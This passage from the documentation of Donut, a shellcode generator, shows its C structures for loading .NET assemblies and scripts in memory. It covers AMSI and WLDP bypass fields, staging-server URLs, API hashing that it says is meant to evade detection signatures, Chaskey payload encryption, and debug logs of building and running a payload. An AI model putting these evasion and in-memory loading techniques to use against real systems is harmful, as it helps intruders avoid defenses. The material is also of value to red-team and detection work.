153 | GetUserDefaultLCID_t <span style='color:#400000; '>GetUserDefaultLCID</span><span style='color:#800080; '>;</span> | |
154 | ||
155 | <span style='color:#696969; '>// imports from oleaut32.dll</span> | |
156 | SafeArrayCreate_t SafeArrayCreate<span style='color:#800080; '>;</span> | |
157 | SafeArrayCreateVector_t SafeArrayCreateVector<span style='color:#800080; '>;</span> | |
158 | SafeArrayPutElement_t SafeArrayPutElement<span style='color:#800080; '>;</span> | |
159 | SafeArrayDestroy_t SafeArrayDestroy<span style='color:#800080; '>;</span> | |
160 | SafeArrayGetLBound_t SafeArrayGetLBound<span style='color:#800080; '>;</span> | |
161 | SafeArrayGetUBound_t SafeArrayGetUBound<span style='color:#800080; '>;</span> | |
162 | SysAllocString_t SysAllocString<span style='color:#800080; '>;</span> | |
163 | SysFreeString_t SysFreeString<span style='color:#800080; '>;</span> | |
164 | LoadTypeLib_t LoadTypeLib<span style='color:#800080; '>;</span> | |
165 | ||
166 | <span style='color:#696969; '>// imports from wininet.dll</span> | |
167 | InternetCrackUrl_t InternetCrackUrl<span style='color:#800080; '>;</span> | |
168 | InternetOpen_t InternetOpen<span style='color:#800080; '>;</span> | |
169 | InternetConnect_t InternetConnect<span style='color:#800080; '>;</span> | |
170 | InternetSetOption_t InternetSetOption<span style='color:#800080; '>;</span> | |
171 | InternetReadFile_t InternetReadFile<span style='color:#800080; '>;</span> | |
172 | InternetCloseHandle_t InternetCloseHandle<span style='color:#800080; '>;</span> | |
173 | HttpOpenRequest_t HttpOpenRequest<span style='color:#800080; '>;</span> | |
174 | HttpSendRequest_t HttpSendRequest<span style='color:#800080; '>;</span> | |
175 | HttpQueryInfo_t HttpQueryInfo<span style='color:#800080; '>;</span> | |
176 | ||
177 | <span style='color:#696969; '>// imports from mscoree.dll</span> | |
178 | CorBindToRuntime_t CorBindToRuntime<span style='color:#800080; '>;</span> | |
179 | CLRCreateInstance_t CLRCreateInstance<span style='color:#800080; '>;</span> | |
180 | ||
181 | <span style='color:#696969; '>// imports from ole32.dll</span> | |
182 | CoInitializeEx_t CoInitializeEx<span style='color:#800080; '>;</span> | |
183 | CoCreateInstance_t CoCreateInstance<span style='color:#800080; '>;</span> | |
184 | CoUninitialize_t CoUninitialize<span style='color:#800080; '>;</span> | |
185 | <span style='color:#800080; '>}</span><span style='color:#800080; '>;</span> | |
186 | <span style='color:#004a43; '>      </span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>endif</span> | |
187 | <span style='color:#800080; '>}</span> api<span style='color:#800080; '>;</span> | |
188 | ||
189 | <span style='color:#696969; '>// everything from here is encrypted</span> | |
190 | <span style='color:#800000; font-weight:bold; '>int</span> api_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the number of 64-bit API hashes required for the instance to work</span> | |
191 | <span style='color:#800000; font-weight:bold; '>int</span> dll_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the number of DLL to load before resolving API</span> | |
192 | <span style='color:#800000; font-weight:bold; '>char</span> dll_name<span style='color:#808030; '>[</span>DONUT_MAX_DLL<span style='color:#808030; '>]</span><span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// a list of DLL strings to load</span> | |
193 | ||
194 | <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span> | |
195 | <span style='color:#800000; font-weight:bold; '>char</span> s<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// amsi.dll</span> | |
196 | uint32_t w<span style='color:#808030; '>[</span><span style='color:#008c00; '>2</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> | |
197 | <span style='color:#800080; '>}</span> amsi<span style='color:#800080; '>;</span> | |
198 | ||
199 | <span style='color:#800000; font-weight:bold; '>char</span> clr<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// clr.dll</span> | |
200 | <span style='color:#800000; font-weight:bold; '>char</span> wldp<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// wldp.dll</span> | |
201 | <span style='color:#800000; font-weight:bold; '>char</span> wldpQuery<span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WldpQueryDynamicCodeTrust</span> | |
202 | <span style='color:#800000; font-weight:bold; '>char</span> wldpIsApproved<span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WldpIsClassInApprovedList</span> | |
203 | ||
204 | <span style='color:#800000; font-weight:bold; '>char</span> amsiInit<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiInitialize</span> | |
205 | <span style='color:#800000; font-weight:bold; '>char</span> amsiScanBuf<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiScanBuffer</span> | |
206 | <span style='color:#800000; font-weight:bold; '>char</span> amsiScanStr<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiScanString</span> | |
207 | ||
208 | uint16_t wscript<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WScript</span> | |
209 | uint16_t wscript_exe<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// wscript.exe</span> | |
210 | ||
211 | <span style='color:#603000; '>GUID</span> xIID_IUnknown<span style='color:#800080; '>;</span> | |
212 | <span style='color:#603000; '>GUID</span> xIID_IDispatch<span style='color:#800080; '>;</span> | |
213 | ||
214 | <span style='color:#696969; '>// GUID required to load .NET assemblies</span> | |
215 | <span style='color:#603000; '>GUID</span> xCLSID_CLRMetaHost<span style='color:#800080; '>;</span> | |
216 | <span style='color:#603000; '>GUID</span> xIID_ICLRMetaHost<span style='color:#800080; '>;</span> | |
217 | <span style='color:#603000; '>GUID</span> xIID_ICLRRuntimeInfo<span style='color:#800080; '>;</span> | |
218 | <span style='color:#603000; '>GUID</span> xCLSID_CorRuntimeHost<span style='color:#800080; '>;</span> | |
219 | <span style='color:#603000; '>GUID</span> xIID_ICorRuntimeHost<span style='color:#800080; '>;</span> | |
220 | <span style='color:#603000; '>GUID</span> xIID_AppDomain<span style='color:#800080; '>;</span> | |
221 | ||
222 | <span style='color:#696969; '>// GUID required to run VBS and JS files</span> | |
223 | <span style='color:#603000; '>GUID</span> xCLSID_ScriptLanguage<span style='color:#800080; '>;</span> <span style='color:#696969; '>// vbs or js</span> | |
224 | <span style='color:#603000; '>GUID</span> xIID_IHost<span style='color:#800080; '>;</span> <span style='color:#696969; '>// wscript object</span> | |
225 | <span style='color:#603000; '>GUID</span> xIID_IActiveScript<span style='color:#800080; '>;</span> <span style='color:#696969; '>// engine</span> | |
226 | <span style='color:#603000; '>GUID</span> xIID_IActiveScriptSite<span style='color:#800080; '>;</span> <span style='color:#696969; '>// implementation</span> | |
227 | <span style='color:#603000; '>GUID</span> xIID_IActiveScriptParse32<span style='color:#800080; '>;</span> <span style='color:#696969; '>// parser</span> | |
228 | <span style='color:#603000; '>GUID</span> xIID_IActiveScriptParse64<span style='color:#800080; '>;</span> | |
229 | ||
230 | <span style='color:#696969; '>// GUID required to run XSL files</span> | |
231 | <span style='color:#603000; '>GUID</span> xCLSID_DOMDocument30<span style='color:#800080; '>;</span> | |
232 | <span style='color:#603000; '>GUID</span> xIID_IXMLDOMDocument<span style='color:#800080; '>;</span> | |
233 | <span style='color:#603000; '>GUID</span> xIID_IXMLDOMNode<span style='color:#800080; '>;</span> | |
234 | ||
235 | <span style='color:#800000; font-weight:bold; '>int</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL </span> | |
236 | ||
237 | <span style='color:#800000; font-weight:bold; '>struct</span> <span style='color:#800080; '>{</span> | |
238 | <span style='color:#800000; font-weight:bold; '>char</span> url<span style='color:#808030; '>[</span>DONUT_MAX_URL<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// staging server hosting donut module</span> | |
239 | <span style='color:#800000; font-weight:bold; '>char</span> req<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// just a buffer for "GET"</span> | |
240 | <span style='color:#800080; '>}</span> http<span style='color:#800080; '>;</span> | |
241 | ||
242 | uint8_t sig<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string to hash</span> | |
243 | uint64_t mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// to verify decryption ok</span> | |
244 | ||
245 | DONUT_CRYPT mod_key<span style='color:#800080; '>;</span> <span style='color:#696969; '>// used to decrypt module</span> | |
246 | uint64_t mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// total size of module</span> | |
247 | ||
248 | <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span> | |
249 | PDONUT_MODULE p<span style='color:#800080; '>;</span> <span style='color:#696969; '>// for URL</span> | |
250 | DONUT_MODULE x<span style='color:#800080; '>;</span> <span style='color:#696969; '>// for PIC</span> | |
251 | <span style='color:#800080; '>}</span> module<span style='color:#800080; '>;</span> | |
252 | <span style='color:#800080; '>}</span> DONUT_INSTANCE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_INSTANCE<span style='color:#800080; '>;</span> | |
253 | </pre> | |
254 | ||
255 | <h3>Module</h3> | |
256 | ||
257 | <p>Modules can be embedded in an <var>Instance</var> or stored on a remote HTTP server.</p> | |
258 | ||
259 | <pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// everything required for a module goes in the following structure</span> | |
260 | <span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_MODULE <span style='color:#800080; '>{</span> | |
261 | <span style='color:#603000; '>DWORD</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// EXE, DLL, JS, VBS, XSL</span> | |
262 | <span style='color:#603000; '>WCHAR</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version for .NET EXE/DLL</span> | |
263 | <span style='color:#603000; '>WCHAR</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// domain name to use for .NET EXE/DLL</span> | |
264 | <span style='color:#603000; '>WCHAR</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace for .NET EXE/DLL</span> | |
265 | <span style='color:#603000; '>WCHAR</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to invoke for .NET DLL or api for unmanaged DLL</span> | |
266 | <span style='color:#603000; '>DWORD</span> param_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// number of parameters for DLL/EXE</span> | |
267 | <span style='color:#603000; '>WCHAR</span> param<span style='color:#808030; '>[</span>DONUT_MAX_PARAM<span style='color:#808030; '>]</span><span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters for DLL/EXE</span> | |
268 | <span style='color:#603000; '>CHAR</span> sig<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// random string to verify decryption</span> | |
269 | ULONG64 mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// to verify decryption was ok</span> | |
270 | ULONG64 len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of EXE/DLL/XSL/JS/VBS file</span> | |
271 | <span style='color:#603000; '>BYTE</span> data<span style='color:#808030; '>[</span><span style='color:#008c00; '>4</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// data of EXE/DLL/XSL/JS/VBS file</span> | |
272 | <span style='color:#800080; '>}</span> DONUT_MODULE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_MODULE<span style='color:#800080; '>;</span> | |
273 | </pre> | |
274 | ||
275 | <h3>API Hashing</h3> | |
276 | ||
277 | <p>A hash function called <em>Maru</em> is used to resolve the address of API at runtime. It uses a Davies-Meyer construction and the SPECK block cipher to derive a 64-bit hash from an API string. The padding is similar to what's used by MD4 and MD5, except that only 32 bits of the string length are stored in the buffer instead of 64 bits. An initial value (IV) chosen randomly ensures the 64-bit API hashes are unique for each instance, so they cannot be used as a static signature for detecting Donut. Future releases will likely support alternative methods of resolving the addresses of APIs to decrease the chance of detection.</p> | |
278 | ||
279 | <h3>Encryption</h3> | |
280 | ||
281 | <p>The following structure is used to hold a master key, counter and nonce for Donut, which are generated randomly.</p> | |
282 | ||
283 | <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CRYPT <span style='color:#800080; '>{</span> | |
284 | <span style='color:#603000; '>BYTE</span> mk<span style='color:#808030; '>[</span>DONUT_KEY_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// master key</span> | |
285 | <span style='color:#603000; '>BYTE</span> ctr<span style='color:#808030; '>[</span>DONUT_BLK_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// counter + nonce</span> | |
286 | <span style='color:#800080; '>}</span> DONUT_CRYPT<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CRYPT<span style='color:#800080; '>;</span> | |
287 | </pre> | |
288 | ||
289 | <p>Chaskey, a 128-bit block cipher with support for 128-bit keys, is used in Counter (CTR) mode to decrypt a <var>Module</var> or an <var>Instance</var> at runtime. If an adversary discovers a staging server, it should not be feasible for them to decrypt a donut module without the key, which is stored in the donut payload. Note that this only protects a module obtained on its own: anyone who obtains the payload itself also has the key and can decrypt both the instance and the module.</p> | |
290 | ||
291 | <h3>Debugging payload</h3> | |
292 | ||
293 | <p>The payload is capable of displaying detailed information about each step of executing a file in memory, which can be useful in tracking down bugs. To build a debug-enabled executable, specify the debug label with nmake/make for both donut.c and payload.c.</p> | |
294 | ||
295 | <pre> | |
296 | nmake debug -f Makefile.msvc | |
297 | make debug -f Makefile.mingw | |
298 | </pre> | |
299 | ||
300 | <p>Use donut to create a payload as you normally would; a file called <code>instance</code> will be saved to disk.</p> | |
301 | ||
302 | <pre> | |
303 | c:\hub\donut>donut -fClass1.dll -cTestClass -mRunProcess -pcalc.exe,notepad.exe | |
304 | ||
305 | [ Donut shellcode generator v0.9.2 | |
306 | [ Copyright (c) 2019 TheWover, Odzhan | |
307 | ||
308 | DEBUG: donut.c:822:DonutCreate(): Entering. | |
309 | DEBUG: donut.c:824:DonutCreate(): Validating configuration and path of file | |
310 | DEBUG: donut.c:840:DonutCreate(): Validating instance type | |
311 | DEBUG: donut.c:880:DonutCreate(): Validating architecture | |
312 | DEBUG: donut.c:277:get_file_info(): Entering. | |
313 | DEBUG: donut.c:286:get_file_info(): Checking extension of Class1.dll | |
314 | DEBUG: donut.c:293:get_file_info(): Extension is ".dll" | |
315 | DEBUG: donut.c:320:get_file_info(): Module is DLL | |
316 | DEBUG: donut.c:327:get_file_info(): Mapping Class1.dll into memory | |
317 | DEBUG: donut.c:222:map_file(): Reading size of file : Class1.dll | |
318 | DEBUG: donut.c:231:map_file(): Opening Class1.dll | |
319 | DEBUG: donut.c:241:map_file(): Mapping 3072 bytes for Class1.dll | |
320 | DEBUG: donut.c:336:get_file_info(): Checking DOS header | |
321 | DEBUG: donut.c:342:get_file_info(): Checking NT header | |
322 | DEBUG: donut.c:348:get_file_info(): Checking IMAGE_DATA_DIRECTORY | |
323 | DEBUG: donut.c:356:get_file_info(): Checking characteristics | |
324 | DEBUG: donut.c:368:get_file_info(): COM Directory found | |
325 | DEBUG: donut.c:384:get_file_info(): Runtime version : v4.0.30319 | |
326 | DEBUG: donut.c:395:get_file_info(): Leaving. | |
327 | DEBUG: donut.c:944:DonutCreate(): Creating module | |
328 | DEBUG: donut.c:516:CreateModule(): Entering. | |
329 | DEBUG: donut.c:520:CreateModule(): Allocating 9504 bytes of memory for DONUT_MODULE | |
330 | DEBUG: donut.c:544:CreateModule(): Domain : TPYTXT7T | |
331 | DEBUG: donut.c:549:CreateModule(): Class : TestClass | |
332 | DEBUG: donut.c:552:CreateModule(): Method : RunProcess | |
333 | DEBUG: donut.c:559:CreateModule(): Runtime : v4.0.30319 | |
334 | DEBUG: donut.c:584:CreateModule(): Adding "calc.exe" | |
335 | DEBUG: donut.c:584:CreateModule(): Adding "notepad.exe" | |
336 | DEBUG: donut.c:610:CreateModule(): Leaving. | |
337 | DEBUG: donut.c:951:DonutCreate(): Creating instance | |
338 | DEBUG: donut.c:621:CreateInstance(): Entering. | |
339 | DEBUG: donut.c:624:CreateInstance(): Allocating space for instance | |
340 | DEBUG: donut.c:631:CreateInstance(): The size of module is 9504 bytes. Adding to size of instance. | |
341 | DEBUG: donut.c:643:CreateInstance(): Generating random key for instance | |
342 | DEBUG: donut.c:649:CreateInstance(): Generating random key for module | |
343 | DEBUG: donut.c:655:CreateInstance(): Generating random string to verify decryption | |
344 | DEBUG: donut.c:661:CreateInstance(): Generating random IV for Maru hash | |
345 | DEBUG: donut.c:666:CreateInstance(): Generating hashes for API using IV: 59e4ea34bad26f10 | |
346 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : LoadLibraryA = 710C9DA8846AE821 | |
347 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetProcAddress = 2334B1630D3B9C85 | |
348 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetModuleHandleA = 5389E01382E0391 | |
349 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualAlloc = 51EE6B0DB215095E | |
350 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualFree = F55A2169F30A6ED4 | |
351 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualQuery = 22DB7628044F6E32 | |
352 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualProtect = 688AA07FEF250016 | |
353 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : Sleep = 5BF1C1B408CCA4A5 | |
354 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : MultiByteToWideChar = 438AD242BBBC755 | |
355 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetUserDefaultLCID = 33ED1B2C1A2F9EC7 | |
356 | DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayCreate = 78AD2BFB55A5E7ED | |
357 | DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayCreateVector = 539F6582DE26F7BC | |
358 | DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayPutElement = 5057AD641F749DA0 | |
359 | DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayDestroy = A63C510FF032080E | |
360 | DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayGetLBound = A37979CE2EEDDA6 | |
361 | DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayGetUBound = 64A9C62452B8653C | |
362 | DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SysAllocString = BFEEAAB6CE6017FB | |
363 | DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SysFreeString = E6FD34B03A2701F6 | |
364 | DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : LoadTypeLib = 2A33214873ADC58C | |
365 | DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetCrackUrlA = 1ADE3553184C68E1 | |
366 | DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetOpenA = 1DEDE3D32F2FCD3 | |
367 | DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetConnectA = 781FD6B18C99CAD2 | |
368 | DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetSetOptionA = 13EC8A292778FC3F | |
369 | DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetReadFile = 8D16E60E7C2E582A | |
370 | DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetCloseHandle = C28E8A3AABB2A755 | |
371 | DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpOpenRequestA = 6C5189610A8545F5 | |
372 | DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpSendRequestA = 4DFA0D985988D31 | |
373 | DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpQueryInfoA = ED09A37256B27F04 | |
374 | DEBUG: donut.c:679:CreateInstance(): Hash for mscoree.dll : CorBindToRuntime = FD669FABED4C6B7 | |
375 | DEBUG: donut.c:679:CreateInstance(): Hash for mscoree.dll : CLRCreateInstance = 56B7AC5C110570B5 | |
376 | DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoInitializeEx = 3733F4734D12D7C | |
377 | DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoCreateInstance = FCB3EAC51E43319B | |
378 | DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoUninitialize = 908A347B45C6E4A2 | |
379 | DEBUG: donut.c:694:CreateInstance(): Copying GUID structures and DLL strings for loading .NET assemblies | |
380 | DEBUG: donut.c:791:CreateInstance(): Copying module data to instance | |
381 | DEBUG: donut.c:796:CreateInstance(): encrypting instance | |
382 | DEBUG: donut.c:808:CreateInstance(): Leaving. | |
383 | DEBUG: donut.c:959:DonutCreate(): Saving instance to file | |
384 | DEBUG: donut.c:992:DonutCreate(): PIC size : 33050 | |
385 | DEBUG: donut.c:999:DonutCreate(): Inserting opcodes | |
386 | DEBUG: donut.c:1035:DonutCreate(): Copying 15218 bytes of x86 + amd64 shellcode | |
387 | DEBUG: donut.c:259:unmap_file(): Unmapping | |
388 | DEBUG: donut.c:262:unmap_file(): Closing | |
389 | DEBUG: donut.c:1061:DonutCreate(): Leaving. | |
390 | [ Instance type : PIC | |
391 | [ Module file : "Class1.dll" | |
392 | [ File type : .NET DLL | |
393 | [ Class : TestClass | |
394 | [ Method : RunProcess | |
395 | [ Parameters : calc.exe,notepad.exe | |
396 | [ Target CPU : x86+AMD64 | |
397 | [ Shellcode : "payload.bin" | |
398 | ||
399 | DEBUG: donut.c:1069:DonutDelete(): Entering. | |
400 | DEBUG: donut.c:1088:DonutDelete(): Leaving. | |
401 | </pre> | |
402 | ||
403 | <p>Pass the instance as a parameter to payload.exe and it will run on the host system as if in a target environment.</p> | |
404 | ||
405 | <pre> | |
406 | c:\hub\donut\payload>payload ..\instance | |
407 | Running... | |
408 | DEBUG: payload.c:45:ThreadProc(): Maru IV : 1899033E0863343E | |
409 | DEBUG: payload.c:48:ThreadProc(): Resolving address for VirtualAlloc() : 9280348A6A2AFA7 | |
410 | DEBUG: payload.c:52:ThreadProc(): Resolving address for VirtualAlloc() : 3A49032E4107D985 | |
411 | DEBUG: payload.c:61:ThreadProc(): VirtualAlloc : 77535ED0 VirtualFree : 77535EF0 | |
412 | DEBUG: payload.c:63:ThreadProc(): Allocating 17800 bytes of RW memory | |
413 | DEBUG: payload.c:70:ThreadProc(): Copying 17800 bytes of data to memory 008D0000 | |
414 | DEBUG: payload.c:74:ThreadProc(): Zero initializing PDONUT_ASSEMBLY | |
415 | DEBUG: payload.c:82:ThreadProc(): Decrypting 17800 bytes of instance | |
416 | DEBUG: payload.c:89:ThreadProc(): Generating hash to verify decryption | |
417 | DEBUG: payload.c:91:ThreadProc(): Instance : c16c69caa83fb13f | Result : c16c69caa83fb13f | |
418 | DEBUG: payload.c:98:ThreadProc(): Resolving LoadLibraryA | |
419 | DEBUG: payload.c:104:ThreadProc(): Loading ole32.dll ... | |
420 | DEBUG: payload.c:104:ThreadProc(): Loading oleaut32.dll ... | |
421 | DEBUG: payload.c:104:ThreadProc(): Loading wininet.dll ... | |
422 | DEBUG: payload.c:104:ThreadProc(): Loading mscoree.dll ... | |
423 | DEBUG: payload.c:108:ThreadProc(): Resolving 33 API | |
424 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 066A0ED9815D3C92 | |
425 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for F3569749C64E1DA5 | |
426 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 09280348A6A2AFA7 | |
427 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 3A49032E4107D985 | |
428 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for FDE50FEB629EB834 | |
429 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 4A4C764EFA89A84F | |
430 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 5D388BA18E017E53 | |
431 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 4EA2B25D8FAABD2B | |
432 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for F1D278132E49F050 | |
433 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for D05386A0F8FF7CAD | |
434 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 8121B63764A390A6 | |
435 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for EB2BFAA408124470 | |
436 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 11B666F77E7303F6 | |
437 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for E8BD6B7A99981E38 | |
438 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for DE78E211DE61998B | |
439 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 09D967C5479A0F9F | |
440 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 6CA1D167C2BFFA9A | |
441 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for AD11F6324A205C5E | |
442 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 5EAEF345362A2811 | |
443 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for A0CC0DC36E8EDD2C | |
444 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for A4241EDCC8B14F85 | |
445 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 756CEB8FF481A72E | |
446 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 8116A255193A09CA | |
447 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for AB14A786531404A1 | |
448 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 1CF4A93D6896380A | |
449 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 61B393CC2DE33733 | |
450 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for ADAF62D44179684A | |
451 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 7F9591B7380CD749 | |
452 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 3CC76B29D676544F | |
453 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 725AA978FD2B1255 | |
454 | DEBUG: peb.c:87:FindExport(): 725aa978fd2b1255 is forwarded to api-ms-win-core-com-l1-1-0.CoInitializeEx | |
455 | DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll | |
456 | DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoInitializeEx) | |
457 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 6C0F670F3C85A407 | |
458 | DEBUG: peb.c:87:FindExport(): 6c0f670f3c85a407 is forwarded to api-ms-win-core-com-l1-1-0.CoCreateInstance | |
459 | DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll | |
460 | DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoCreateInstance) | |
461 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 2996694CA69B44E8 | |
462 | DEBUG: peb.c:87:FindExport(): 2996694ca69b44e8 is forwarded to api-ms-win-core-com-l1-1-0.CoUninitialize | |
463 | DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll | |
464 | DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoUninitialize) | |
465 | DEBUG: payload.c:127:ThreadProc(): Using module embedded in instance | |
466 | DEBUG: inmem_dotnet.c:43:LoadAssembly(): Using module embedded in instance | |
467 | DEBUG: inmem_dotnet.c:51:LoadAssembly(): CLRCreateInstance | |
468 | DEBUG: inmem_dotnet.c:59:LoadAssembly(): ICLRMetaHost::GetRuntime("v4.0.30319") | |
469 | DEBUG: inmem_dotnet.c:66:LoadAssembly(): ICLRRuntimeInfo::IsLoadable | |
470 | DEBUG: inmem_dotnet.c:70:LoadAssembly(): ICLRRuntimeInfo::GetInterface | |
471 | DEBUG: inmem_dotnet.c:78:LoadAssembly(): HRESULT: 00000000 | |
